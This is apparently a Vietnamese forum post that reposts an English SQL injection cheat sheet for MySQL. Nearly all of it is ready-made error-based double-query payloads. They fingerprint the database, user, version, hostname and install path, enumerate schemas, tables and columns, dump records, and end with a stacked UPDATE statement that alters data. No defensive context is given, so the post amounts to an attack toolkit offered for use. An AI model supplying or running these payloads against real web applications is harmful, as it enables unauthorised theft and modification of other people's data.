Hôm nay mình share bài viết về cách khai thác Blind SQL Injection bằng tiếng anh khá hay và đầy đủ
- 1. To test blind injection
' and 'x'='x2. To select the current database (Output will be in Hexadecimal, decode to ASCII
' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='13. To find the current user
1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='14. To find MySQL Version
1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='15. Find current database
1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='16. To find the system user
1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='17. To find the hostname
1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='18. To find the installation directory
1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='19. To find the DB User
1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='110. To find the databases
Note: Keep incrementing n (n, n+1, n+2, ...) for as long as you keep getting a response.
1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='111. To count the number of tables in the selected database
Note: Record this count as n.
Replace the placeholder strings (shown in color in the original post) with the appropriate values.
1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='112. To get the table names in the selected database
Note: m-n means run this query once for each value m, m+1, …, n-1.
Replace the placeholder strings (shown in color in the original post) with the appropriate values.
1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='113. To get number of columns in the selected table name
Note: Record this count as n.
Replace the placeholder strings (shown in color in the original post) with the appropriate values.
1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='114. To get column names of a selected table name
Note: m-n means run this query once for each value m, m+1, …, n-1.
Replace the placeholder strings (shown in color in the original post) with the appropriate values.
1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='115. To count the number of records in a selected column
Note: Record this count as n.
1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count,0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='116. To fetch records from a selected column
Note: m-n means run this query once for each value m, m+1, …, n-1.
Replace the placeholder strings (shown in color in the original post) with the appropriate values.
1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='117. Update a record in the selected column
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--Ở phần trước: Error based/Double query
Phần kế tiếp: Mình sẽ viết 1 bài khá chi tiết về cách khai thác lỗi SQL cho newbie.